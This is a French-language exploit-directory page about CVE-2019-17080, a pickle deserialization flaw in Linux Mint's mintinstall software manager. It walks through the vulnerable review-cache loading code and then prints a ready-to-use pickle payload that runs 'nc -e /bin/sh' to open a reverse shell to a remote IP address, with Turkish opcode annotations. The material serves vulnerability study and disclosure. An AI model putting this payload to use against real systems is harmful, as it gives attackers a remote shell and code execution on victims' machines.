Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Outils/GitHubGitHub/materaj2/mintinstall-object-injection
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFApprentissage et ÉducationExploitation de Binaires
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 6 ansPas encore vérifié

Le gestionnaire de logiciels Linux Mint (v 7.9.5/9) nous amène à exécuter une injection d'objets et du code arbitraire en raison d'une configuration incorrecte.

root@kitploit:~
mintinsall

S'il y a un nouveau commentaire new-reviews.list télécharger depuis et écrire dans le fichier.

root@kitploit:~
code mintinstall.py

Lorsque le gestionnaire de logiciels démarre pour la première fois, il appelle la classe ReviewCache() du module reviews.

Comment traite-t-il les données ?

root@kitploit:~
code reviews.py

Lorsque la classe ReviewCache démarre (init), elle appelle _load_cache().

La fonction Load cache lit le fichier dans la variable REVIEWS_CACHE et désérialise les données du fichier à l'aide du module pickle, puis conserve certaines valeurs en mémoire.

Quand je vérifie le fichier, il semble que j'ai le droit d'écrire.

Pickle puisque nous pouvons effectuer des opérations de sérialisation/désérialisation avec le module, nous pouvons inclure le module et exécuter du code arbitraire en utilisant la méthode reduce.

Si vous tentez de désérialiser le fichier, notre code malveillant s'exécutera.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text

Télécharger l’outil